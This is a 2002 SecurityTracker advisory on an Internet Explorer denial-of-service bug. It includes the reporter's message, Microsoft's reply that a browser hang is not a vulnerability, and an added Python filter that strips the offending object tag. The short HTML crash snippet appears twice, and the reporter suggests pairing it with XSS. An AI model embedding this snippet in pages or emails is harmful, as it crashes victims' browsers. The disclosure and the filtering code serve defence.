SecurityTracker.com
Category:  Application (Web Browser)  >  Internet Explorer (IE)
Vendors:  Microsoft
Microsoft Internet Explorer Can Be Crashed By Malicious AVI Object in HTML
SecurityTracker Alert ID:  1004618
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jun 25 2002
Impact:  Denial of service via network
Exploit Included:  Yes  
Description:  'ken'@FTU reported a denial of service vulnerability in Microsoft's Internet Explorer web browser. A remote user can create HTML that, when loaded by a target user, will cause the target user's browser to crash.

It is reported that the following line of AVI handler code in an HTML web page (or HTML-based e-mail) will cause IE to crash:

<!-- start dosIE-doe.html -->

<object ID="dosIE-doe"
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>

<!-- end dosIE-doe.html -->

The vendor has reportedly been notified.

Impact:  A malicious web page or HTML-based e-mail message can cause IE to crash.
Solution:  No solution was available at the time of this entry.

Microsoft reportedly does not classify this as a security vulnerability in accordance with their definitions:

http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp

Vendor URL:  www.microsoft.com/technet/security/
Cause:  Exception handling error
Underlying OS:  Windows (2000), Windows (XP)
Reported By:  "'ken'@FTU" <ken_at_ftu@yahoo.com>
Message History:   None.
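
Since no fix was available at the time of the entry, a mail or web gateway could flag or strip the reported object before it reaches the browser. The following is an added example, not part of the SecurityTracker entry or the reporter's message; the function names, the placeholder text and the two extra sample strings are assumptions, and only the CLSID and the first sample come from the page.

```python
import html
import re

# CLSID copied from the advisory's snippet; extend the set with others as needed.
BLOCKED_CLSIDS = {"00022613-0000-0000-C000-000000000046"}
PLACEHOLDER = "<!-- blocked object removed -->"  # assumed replacement text

# Deliberately tolerant: the reported tag has no closing '>' of its own, so
# match from '<object' up to the next '>' rather than relying on a strict parser.
OBJECT_TAG = re.compile(r"<object\b([^>]*)>?", re.IGNORECASE)
CLASSID_ATTR = re.compile(
    r"""\bclassid\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)

def normalize_clsid(value):
    """Reduce 'clsid:{GUID}' spellings to a bare upper-case GUID."""
    value = html.unescape(value).strip().strip("\"'")
    if value.lower().startswith("clsid:"):
        value = value[len("clsid:"):]
    return value.strip().strip("{}").upper()

def find_blocked_objects(markup):
    """Return every blocked CLSID named by an <object> tag in markup."""
    hits = []
    for tag in OBJECT_TAG.finditer(markup):
        for attr in CLASSID_ATTR.finditer(tag.group(1)):
            raw = next(g for g in attr.groups() if g is not None)
            clsid = normalize_clsid(raw)
            if clsid in BLOCKED_CLSIDS:
                hits.append(clsid)
    return hits

def neutralize(markup):
    """Replace each <object ...> opening tag that names a blocked CLSID."""
    def replace(tag):
        text = tag.group(0)
        return PLACEHOLDER if find_blocked_objects(text) else text
    return OBJECT_TAG.sub(replace, markup)

# Samples: the advisory's snippet, then two constructed tags (a re-spelled
# variant of the same CLSID and a tag naming a different CLSID).
REPORTED = ('<object ID="dosIE-doe"\n'
            'CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>')
VARIANT = "<OBJECT classid='clsid&#58;{00022613-0000-0000-c000-000000000046}'></OBJECT>"
OTHER = '<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"></object>'

if __name__ == "__main__":
    for sample in (REPORTED, VARIANT, OTHER):
        print(find_blocked_objects(sample), "->", neutralize(sample))
```

Matching is done on the normalized GUID, so case changes, braces and character references in the classid value do not bypass the check.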


 Source Message Contents

Date:  Mon, 24 Jun 2002 22:27:27 -0400
From:  "'ken'@FTU" <ken_at_ftu@yahoo.com>
Subject:  A DoS against IE in W2K and XP? You Make the Call...

 


The following line of code will crash IE when the OS is Windows 2000 or 
Windows XP.

<!--  start dosIE-doe.html -->

<object ID="dosIE-doe" 
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>

<!-- end dosIE-doe.html -->


I alerted Microsoft. They replied that it is not a security 
vulnerability according to their policy:

================= Begin MS reply ========================

"Suppose a flaw in a web browser could be misused by a web site to
"hang" the browser of any user who visited the site. If the user were
able to resume normal operation by stopping the browser, restarting it,
and avoiding the attacker's web site in the future, the flaw would not
constitute a security vulnerability."
(For the complete definition of a security vulnerability please see
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp)

================= End MS reply ===========================


I am aware that this code is more an inconvenience than anything else. 
Although, if it were combined with another vulnerability its effect may 
be much worse. (Say an XSS vulnerability also exists and an attacker 
could crash the browser of every user that visits your ecommerce
site...)


'ken'@FTU



-- 
"I grew convinced that truth, sincerity and integrity in dealings 
between man and man were of the utmost importance to the felicity of 
life, and I formed a written resolution to practice them ever while I 
lived."
	-Benjamin Franklin, The Autobiography of Benjamin Franklin



 



Copyright 2002, SecurityGlobal.net LLC